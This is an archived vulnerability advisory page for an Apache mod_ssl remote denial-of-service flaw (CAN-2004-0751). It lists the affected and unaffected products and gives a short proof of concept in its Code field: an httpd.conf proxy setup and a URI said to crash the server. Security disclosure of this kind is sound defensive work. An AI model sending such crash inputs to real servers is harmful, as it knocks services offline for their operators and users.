exploits , vulnerabilities , articles , Apache mod_ssl Remote Denial of Service Vulnerability

Title	Apache mod_ssl Remote Denial of Service Vulnerability
Published	2004-09-10-12:00AM
Updated	2005-01-13-05:33PM
Class	Failure to Handle Exceptional Conditions
CVE	CAN-2004-0751
Remote	Yes
Local	No
Credit	Discovery is credited to M. "Alex" Hankins <lxhankins002@fastmail.fm>.
Vulnerable	Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Home Trustix Secure Linux 2.1 Trustix Secure Linux 2.0 Trustix Secure Enterprise Linux 2.0 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux AS 3 RedHat Desktop 3.0 MandrakeSoft Linux Mandrake 10.0 amd64 MandrakeSoft Linux Mandrake 10.0 MandrakeSoft Linux Mandrake 9.2 amd64 MandrakeSoft Linux Mandrake 9.2 HP Tru64 UNIX Compaq Secure Web Server 6.3 HP Tru64 UNIX Compaq Secure Web Server 5.9.2 HP Tru64 UNIX Compaq Secure Web Server 5.9.1 HP Tru64 UNIX Compaq Secure Web Server 5.8.2 HP Tru64 UNIX Compaq Secure Web Server 5.8.1 HP Tru64 UNIX Compaq Secure Web Server 5.1 A HP Tru64 UNIX Compaq Secure Web Server 5.1 HP Tru64 UNIX Compaq Secure Web Server 5.0 A HP Tru64 UNIX Compaq Secure Web Server 4.0 G HP Tru64 UNIX Compaq Secure Web Server 4.0 F HP HPUX B.11.23 HP HPUX B.11.22 HP HPUX B.11.11 HP HPUX B.11.00 Gentoo Linux 1.4 Conectiva Linux 10.0 Conectiva Linux 9.0 Apache Software Foundation Apache 2.0.50 MandrakeSoft Linux Mandrake 10.1 MandrakeSoft Linux Mandrake 10.1 x86_64 Apache Software Foundation Apache 2.0.47 Apple Mac OS X Server 10.1 Apple Mac OS X Server 10.1.1 Apple Mac OS X Server 10.1.2 Apple Mac OS X Server 10.1.3 Apple Mac OS X Server 10.1.4 Apple Mac OS X Server 10.1.5 Apple Mac OS X Server 10.2 Apple Mac OS X Server 10.2.1 Apple Mac OS X Server 10.2.2 Apple Mac OS X Server 10.2.3 Apple Mac OS X Server 10.2.4 Apple Mac OS X Server 10.2.5 Apple Mac OS X Server 10.2.6 Apple Mac OS X Server 10.2.7 Apple Mac OS X Server 10.2.8 Apple Mac OS X Server 10.3 Apple Mac OS X Server 10.3.1 Apple Mac OS X Server 10.3.2 Apple Mac OS X Server 10.3.3 Apple Mac OS X Server 10.3.4 Apple Mac OS X Server 10.3.5 MandrakeSoft Linux Mandrake 9.1 MandrakeSoft Linux Mandrake 9.1 ppc MandrakeSoft Linux Mandrake 9.2 MandrakeSoft Linux Mandrake 9.2 amd64
Not Vulnerable	HP Tru64 UNIX Compaq Secure Web Server 6.3.2 a Apache Software Foundation Apache 2.0.51 RedHat Fedora Core1
Code	No exploit is required. The following proof of concept is available: With the following configuration in httpd.conf: Listen 47290 SSLProxyEngine on RewriteEngine on RewriteRule /(.*) https://www.example.com/$1 [P] The server may be crashed by issuing the following URI: http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-04 Achievo Document Types Section Arbitrary File Upload Vulnerability
• 2009-12-04 Achievo Scheduler Category HTML Injection Vulnerability
• 2009-12-04 Yoast Google Analytics for WordPress Plugin 404 Error Page Cross Site Scripting Vulnerability
• 2009-12-04 DevIL DICOM File Handling Remote Buffer Overflow Vulnerability
• 2009-12-04 Invision Power Board Local File Include and SQL Injection Vulnerabilities
• 2009-12-04 Mozilla Firefox Yoono Extension DOM Event Handler Cross Domain Scripting Vulnerability
• 2009-12-04 UBB.threads Multiple File Include Vulnerabilities
• 2009-12-04 Expat Unspecified XML Parsing Remote Denial of Service Vulnerability
• 2009-12-04 Apple Mac OS X Java Applet Certificate Validation Security Bypass Vulnerability
• 2009-12-04 QEMU Virtio Networking Remote Denial of Service Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 05 Dec 2009 23:16:11 +0000